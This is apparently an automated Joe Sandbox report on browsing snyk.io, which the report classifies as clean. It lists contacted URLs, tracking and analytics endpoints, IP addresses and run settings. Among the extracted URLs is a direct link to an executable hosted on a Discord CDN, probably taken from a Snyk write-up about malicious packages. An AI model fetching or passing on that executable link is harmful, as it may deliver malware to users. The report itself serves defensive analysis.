                                                                                                                        unknown
                                                                                                                        https://tracking.intentsify.io/page-tracking/intentsify-sync/https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2Ffalse
                                                                                                                          unknown
                                                                                                                          https://js.zi-scripts.com/unified/v1/master/getSubscriptionsfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://js.driftt.com/core/assets/js/22.6b9a301a.chunk.jsfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://js.driftt.com/core/assets/css/27.b5e8f5e1.chunk.cssfalse
                                                                                                                            unknown
                                                                                                                            https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/about.json?slug=aboutfalse
                                                                                                                              unknown
                                                                                                                              https://go.snyk.io/index.php/form/getForm?munchkinId=677-THP-415&form=2940&url=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&callback=jQuery37105299860925787463_1729799371942&_=1729799371943false
                                                                                                                                unknown
                                                                                                                                https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform/security-intelligence.json?slug=platform&slug=security-intelligencefalse
                                                                                                                                  unknown
                                                                                                                                  https://app.usercentrics.eu/browser-ui/latest/bundle.jsfalse
                                                                                                                                    unknown
                                                                                                                                    https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/podcasts/the-secure-developer.jsonfalse
                                                                                                                                      unknown
                                                                                                                                      https://snyk.io/_next/static/chunks/2165.946eebc4630896bc.jsfalse
                                                                                                                                        unknown
                                                                                                                                        https://uct.service.usercentrics.eu/uct?v=1&sid=Zz23KCbJ4&t=1&abv=&r=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&cb=1729799382000false
                                                                                                                                          unknown
                                                                                                                                          https://cdn.segment.com/analytics-next/bundles/schemaFilter.bundle.5c2661f67b4b71a6d9bd.jsfalse
                                                                                                                                            unknown
                                                                                                                                            https://snyk.io/false
                                                                                                                                              unknown
                                                                                                                                              https://js.driftt.com/include/1729799400000/4479srg8vkz5.jsfalse
                                                                                                                                                unknown
                                                                                                                                                https://snyk.io/_next/static/chunks/5030.3b020cf8ffddffa3.jsfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://cdn.segment.com/v1/projects/UspolAZH46ZIH3mN3bdf7rx63q24gitb/settingsfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US.jsonfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform/deepcode-ai.json?slug=platform&slug=deepcode-aifalse
                                                                                                                                                        unknown
                                                                                                                                                        https://snyk.io/favicon.icofalse
                                                                                                                                                          unknown
                                                                                                                                                          https://snyk.io/_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1686142464%2Fillustration-ui-spot-snyk-deepcode-hybrid-accuracy.png&w=960&q=75false
                                                                                                                                                            unknown
                                                                                                                                                            https://snyk.io/_next/static/chunks/webpack-1e81cdc3aa31d741.jsfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://js.driftt.com/core/assets/css/8.6ac3976b.chunk.cssfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                              https://res.cloudinary.com/snyk/image/upload/v1645182199/snyk-marketingui/brand-logos/wordmark-logo-chromecache_612.2.drfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://res.cloudinary.com/snyk/image/upload/v1646599506/wordpress-sync/blog-log4shell-import.pngchromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://snyk.io/platform/chromecache_488.2.dr, chromecache_540.2.drfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://www.youtube.com/watch?v=s7N1_IK6QJEchromecache_443.2.dr, chromecache_541.2.drfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://res.cloudinary.com/snyk/image/upload/v1646599509/wordpress-sync/blog-log4shell-intellij.pngchromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://cwe.mitre.org/data/definitions/121.htmlchromecache_385.2.dr, chromecache_556.2.drfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://res.cloudinary.com/snyk/image/upload/v1696529494/blog-webp-fix-report.jpgchromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://snykcon.io/chromecache_533.2.dr, chromecache_282.2.drfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://res.cloudinary.com/snyk/image/upload/v1684306021/blog-recharge-belyn-3.jpgchromecache_469.2.dr, chromecache_403.2.drfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://ampcid.google.com/v1/publisher:getClientIdchromecache_262.2.dr, chromecache_421.2.drfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://www.linkedin.com/in/guypo/chromecache_533.2.dr, chromecache_282.2.drfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://updates.snyk.io/chromecache_321.2.drfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://res.cloudinary.com/snyk/image/upload/v1663712676/wordpress-sync/illustration-snyk-code-hero.chromecache_488.2.dr, chromecache_540.2.drfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://metrics.api.drift.comchromecache_261.2.dr, chromecache_544.2.drfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://www.linkedin.com/in/kalpeshdharwadkar/chromecache_385.2.dr, chromecache_556.2.drfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://nvd.nist.gov/vuln-metrics/cvsschromecache_385.2.dr, chromecache_556.2.drfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://res.cloudinary.com/snyk/image/upload/v1646599507/wordpress-sync/blog-log4shell-vuln.pngchromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://res.cloudinary.com/snyk/image/upload/v1646599501/wordpress-sync/image-4-4.pngchromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://res.cloudinary.com/snyk/image/upload/v1685025412/blog-aapi-month-Waleed.jpgchromecache_469.2.dr, chromecache_403.2.drfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://res.cloudinary.com/snyk/image/upload/v1628775553/wordpress-sync/graphic-support.svgchromecache_626.2.dr, chromecache_279.2.drfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://docs.snyk.io/scan-applications/snyk-container/how-snyk-container-works/supported-operating-schromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://security.snyk.io/chromecache_443.2.dr, chromecache_541.2.dr, chromecache_484.2.dr, chromecache_321.2.dr, chromecache_460.2.dr, chromecache_616.2.dr, chromecache_365.2.drfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        http://res.cloudinary.com/snyk/image/upload/v1682439081/blog-preventing-xss-product-controller.jpgchromecache_488.2.dr, chromecache_540.2.drfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://support.snyk.io/hc/en-us/articles/360000925418-What-counts-as-a-test-chromecache_412.2.dr, chromecache_627.2.drfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            http://res.cloudinary.com/snyk/image/upload/v1668023447/illlustration-ui-full-vuln-db-malicious-packchromecache_512.2.drfalse
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              http://res.cloudinary.com/snyk/image/upload/t_Social%20Sharingchromecache_488.2.dr, chromecache_540.2.drfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://res.cloudinary.com/snyk/image/upload/v1713534634/illustration-ui-apprisk-global-dimension-filchromecache_313.2.dr, chromecache_511.2.drfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  https://www.openssl.org/blog/blog/2022/11/01/email-address-overflows/chromecache_612.2.drfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    https://curl.se/changes.html#0_1chromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://security.snyk.io/vuln/SNYK-UNMANAGED-WEBMPROJECTLIBWEBP-5918283chromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://res.cloudinary.com/snyk/image/upload/v1685025413/blog-aapi-month-Karuna.jpgchromecache_469.2.dr, chromecache_403.2.drfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://res.cloudinary.com/snyk/image/upload/v1663712674/wordpress-sync/illustrated-ui-snyk-code.svgchromecache_488.2.dr, chromecache_540.2.drfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            https://docs.snyk.io/features/snyk-cli/secure-your-projects-in-the-long-term/monitor-your-projects-achromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              http://res.cloudinary.com/snyk/image/upload/v1717775643/Customer_-_Rei.pngchromecache_331.2.dr, chromecache_619.2.drfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                https://github.com/verdaccio/verdacciochromecache_443.2.dr, chromecache_541.2.drfalse
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  https://github.com/mafintoshchromecache_522.2.dr, chromecache_512.2.drfalse
                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                    https://res.cloudinary.com/snyk/image/upload/v1646599497/wordpress-sync/image6-13.pngchromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://res.cloudinary.com/snyk/image/upload/v1682439081/blog-preventing-xss-snyk-code-report.jpgchromecache_488.2.dr, chromecache_540.2.drfalse
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://github.blog/2021-02-12-avoiding-npm-substitution-attacks/chromecache_443.2.dr, chromecache_541.2.drfalse
                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                          https://res.cloudinary.com/snyk/image/upload/v1663712800/wordpress-sync/illustration-snyk-container-chromecache_428.2.dr, chromecache_394.2.drfalse
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://res.cloudinary.com/snyk/image/upload/v1672705017/customer-logos/CVS_Health_logo_1.svgchromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://docs.snyk.io/features/integrations/ide-toolschromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                https://security.snyk.io/vuln/SNYK-UNMANAGED-CURL-5931782chromecache_612.2.drfalse
                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                  https://www.openssl.org/news/vulnerabilities.htmlchromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    https://developers.marketo.com/MunchkinLicense.pdfchromecache_473.2.dr, chromecache_299.2.dr, chromecache_399.2.dr, chromecache_486.2.drfalse
                                                                                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    https://partners.snyk.io/English/solutions/chromecache_287.2.dr, chromecache_346.2.drfalse
                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                      https://res.cloudinary.com/snyk/image/upload/v1713534635/illustration-ui-apprisk-prioritize-top-riskchromecache_313.2.dr, chromecache_511.2.drfalse
                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                        http://res.cloudinary.com/snyk/image/upload/v1678125740/blog-mitigating-path-traversal-snyk-code-ui.chromecache_488.2.dr, chromecache_540.2.drfalse
                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                          https://customer.api.drift.comchromecache_261.2.dr, chromecache_544.2.drfalse
                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                            https://res.cloudinary.com/snyk/image/upload/v1682439081/blog-preventing-xss-product-controller.jpgchromecache_488.2.dr, chromecache_540.2.drfalse
                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                              https://nvd.nist.gov/vuln/detail/CVE-2020-9365chromecache_385.2.dr, chromecache_556.2.drfalse
                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                https://res.cloudinary.com/snyk/image/upload/v1680276999/blog-mitigating-path-traversal-cwe-23.jpgchromecache_488.2.dr, chromecache_540.2.drfalse
                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                  https://snyk.docs.apiary.io/chromecache_443.2.dr, chromecache_541.2.drfalse
                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                    https://partners.snyk.io/English/locator/chromecache_287.2.dr, chromecache_346.2.drfalse
                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                      https://medium.com/chromecache_512.2.drfalse
                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                        https://res.cloudinary.com/snyk/image/upload/v1684306023/blog-recharge-belyn-2.jpgchromecache_469.2.dr, chromecache_403.2.drfalse
                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                          https://snyk.io/policies/terms-of-service/chromecache_283.2.dr, chromecache_452.2.dr, chromecache_470.2.dr, chromecache_308.2.drfalse
                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                            https://app.snyk.io/login?cta=sign-upchromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                              https://www.globaltechcouncil.org/ethical-hacking/12-benefits-of-hiring-a-certified-ethical-hacker/chromecache_392.2.dr, chromecache_387.2.drfalse
                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                https://res.cloudinary.com/snyk/image/upload/v1646599505/wordpress-sync/blog-log4shell-manual-fix.pnchromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                  https://security.snyk.io/vuln/SNYK-UNMANAGED-OPENSSL-3090874chromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                    https://docs.snyk.io/features/integrations/git-repository-scm-integrationschromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                      https://res.cloudinary.com/snyk/image/upload/v1729618965/default-report.b205b2e0.svgchromecache_321.2.drfalse
                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                        https://learn.snyk.io/lesson/xss/chromecache_488.2.dr, chromecache_540.2.drfalse
                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                          https://res.cloudinary.com/snyk/image/upload/v1684342367/blog-recharge-noa.jpgchromecache_469.2.dr, chromecache_403.2.drfalse
                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                            https://conversation.api.drift.comchromecache_261.2.dr, chromecache_544.2.drfalse
                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                              https://app.snyk.io/auth/dockerchromecache_283.2.dr, chromecache_533.2.dr, chromecache_282.2.dr, chromecache_434.2.dr, chromecache_452.2.dr, chromecache_506.2.drfalse
                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                https://partners.snyk.io/English/register_email.aspxchromecache_287.2.dr, chromecache_346.2.drfalse
                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                  https://snyk.iochromecache_321.2.dr, chromecache_521.2.drfalse
                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                    https://docs.snyk.io/scan-application-code/snyk-codechromecache_488.2.dr, chromecache_540.2.drfalse
                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                      http://res.cloudinary.com/snyk/image/upload/v1676184612/feature-fedramp.jpgchromecache_484.2.dr, chromecache_365.2.drfalse
                                                                                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                                                                                        https://cdn.discordapp.com/attachments/1003368479442874518/1003368773983682592/ZYRBX.exechromecache_522.2.dr, chromecache_512.2.drfalse
                                                                                                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                                                                                                          http://res.cloudinary.com/snyk/image/upload/v1697730907/blog-github-copilot-img-onload.jpgchromecache_488.2.dr, chromecache_540.2.drfalse
                                                                                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                                                                                            https://docs.snyk.io/features/snyk-clichromecache_260.2.dr, chromecache_612.2.drfalse
                                                                                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                                              142.250.186.68
                                                                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                              34.200.187.106
                                                                                                                                                                                                                                                                                                              stage-lb-orleans-1774680323.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                              75.2.108.141
                                                                                                                                                                                                                                                                                                              eps.6sc.coUnited States
                                                                                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                              13.35.58.23
                                                                                                                                                                                                                                                                                                              v.eps.6sc.coUnited States
                                                                                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                              184.169.181.245
                                                                                                                                                                                                                                                                                                              intentsify-production-lb-17344489.us-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                              34.120.28.121
                                                                                                                                                                                                                                                                                                              aggregator.service.usercentrics.euUnited States
                                                                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                              18.66.102.62
                                                                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                                                                              3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                                                              35.155.246.37
                                                                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                              104.17.72.206
                                                                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                              216.239.32.181
                                                                                                                                                                                                                                                                                                              analytics-alv.google.comUnited States
                                                                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                              34.95.108.180
                                                                                                                                                                                                                                                                                                              uct.service.usercentrics.euUnited States
                                                                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                              3.161.242.80
                                                                                                                                                                                                                                                                                                              d2l187peir7p6k.cloudfront.netUnited States
                                                                                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                              104.16.118.43
                                                                                                                                                                                                                                                                                                              ws.zoominfo.comUnited States
                                                                                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                              35.190.14.188
                                                                                                                                                                                                                                                                                                              app.usercentrics.euUnited States
                                                                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                              239.255.255.250
                                                                                                                                                                                                                                                                                                              unknownReserved
                                                                                                                                                                                                                                                                                                              unknownunknownfalse
                                                                                                                                                                                                                                                                                                              134.213.193.62
                                                                                                                                                                                                                                                                                                              677-thp-415.mktoresp.comIreland
                                                                                                                                                                                                                                                                                                              15395RACKSPACE-LONGBfalse
                                                                                                                                                                                                                                                                                                              104.17.71.206
                                                                                                                                                                                                                                                                                                              lon10.mktossl.comUnited States
                                                                                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                              23.45.111.160
                                                                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                                                                              20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                                                                              99.86.8.175
                                                                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                              35.201.111.240
                                                                                                                                                                                                                                                                                                              consent-api.service.consent.usercentrics.euUnited States
                                                                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                              143.204.179.196
                                                                                                                                                                                                                                                                                                              d296je7bbdd650.cloudfront.netUnited States
                                                                                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                              74.125.133.154
                                                                                                                                                                                                                                                                                                              stats.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                              74.125.71.155
                                                                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                              104.18.37.212
                                                                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                              142.250.185.164
                                                                                                                                                                                                                                                                                                              www.google.comUnited States
                                                                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                              185.89.210.82
                                                                                                                                                                                                                                                                                                              ib.anycast.adnxs.comGermany
                                                                                                                                                                                                                                                                                                              29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                                                                                                              172.217.23.98
                                                                                                                                                                                                                                                                                                              googleads.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                              35.174.152.127
                                                                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                              35.241.3.184
                                                                                                                                                                                                                                                                                                              api.usercentrics.euUnited States
                                                                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                              18.245.86.77
                                                                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                              23.77.250.63
                                                                                                                                                                                                                                                                                                              snyk.ioUnited States
                                                                                                                                                                                                                                                                                                              16625AKAMAI-ASUSfalse
                                                                                                                                                                                                                                                                                                              35.175.94.211
                                                                                                                                                                                                                                                                                                              scout.us1.salesloft.comUnited States
                                                                                                                                                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                              18.245.86.73
                                                                                                                                                                                                                                                                                                              dl7g9llrghqi1.cloudfront.netUnited States
                                                                                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                              185.89.210.141
                                                                                                                                                                                                                                                                                                              unknownGermany
                                                                                                                                                                                                                                                                                                              29990ASN-APPNEXUSfalse
                                                                                                                                                                                                                                                                                                              150.171.27.10
                                                                                                                                                                                                                                                                                                              ax-0001.ax-msedge.netUnited States
                                                                                                                                                                                                                                                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                                              172.64.150.44
                                                                                                                                                                                                                                                                                                              js.zi-scripts.comUnited States
                                                                                                                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                              142.250.186.164
                                                                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                              35.81.90.104
                                                                                                                                                                                                                                                                                                              api.segment.ioUnited States
                                                                                                                                                                                                                                                                                                              237MERIT-AS-14USfalse
                                                                                                                                                                                                                                                                                                              65.9.66.118
                                                                                                                                                                                                                                                                                                              d1ysmqklpsb9ih.cloudfront.netUnited States
                                                                                                                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                              142.250.186.66
                                                                                                                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                              IP
                                                                                                                                                                                                                                                                                                              192.168.2.5
                                                                                                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                                              Analysis ID:1541477
                                                                                                                                                                                                                                                                                                              Start date and time:2024-10-24 21:47:53 +02:00
                                                                                                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                                              Overall analysis duration:0h 4m 4s
                                                                                                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                                                                                                              Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                                                                                              Sample URL:http://snyk.io
                                                                                                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                              Number of analysed new started processes analysed:7
                                                                                                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                              Detection:CLEAN
                                                                                                                                                                                                                                                                                                              Classification:clean1.win@22/545@148/41
                                                                                                                                                                                                                                                                                                              EGA Information:Failed
                                                                                                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.184.195, 142.250.181.238, 64.233.167.84, 34.104.35.123, 104.17.201.1, 104.17.202.1, 142.250.184.200, 142.250.185.168, 172.217.18.10, 142.250.186.35, 52.149.20.212, 199.232.214.172, 192.229.221.95, 20.242.39.171, 95.101.111.184, 95.101.111.170, 52.165.164.15, 142.250.186.130, 142.250.185.106, 216.58.212.138, 142.250.186.42, 142.250.186.74, 142.250.185.234, 216.58.206.42, 172.217.18.106, 142.250.184.234, 142.250.185.170, 142.250.185.74, 216.58.206.74, 142.250.181.234, 142.250.185.202, 142.250.185.138, 142.250.186.170, 172.217.16.138, 20.109.210.53, 142.250.186.131, 2.16.164.35, 2.16.164.10, 142.250.184.206, 13.107.42.14, 2.18.64.212, 2.18.64.220, 142.250.185.136, 104.102.43.106, 104.18.41.41, 172.64.146.215, 104.16.72.105, 104.16.71.105, 142.250.185.232
                                                                                                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, scout-cdn.salesloft.com.cdn.cloudflare.net, clientservices.googleapis.com, e10776.b.akamaiedge.net, ipv6-2.6sc.co.edgekey.net, wildcard.marketo.net.edgekey.net, l-0005.l-msedge.net, clients2.google.com, ocsp.digicert.com, www.googletagmanager.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, bat.bing.com, update.googleapis.com, e212585.b.akamaiedge.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, c2.6sc.co.edgekey.net, www.google-analytics.com, www-linkedin-com.l-0005.l-msedge.net, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, fonts.gstatic.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, b2.6sc.co.edgekey.net, ctldl.windowsupdate.com, j2.6sc.co.edgekey.net, pagead2.googlesyndication.com, od.linkedin.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery
                                                                                                                                                                                                                                                                                                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                              • VT rate limit hit for: http://snyk.io
                                                                                                                                                                                                                                                                                                              No simulations
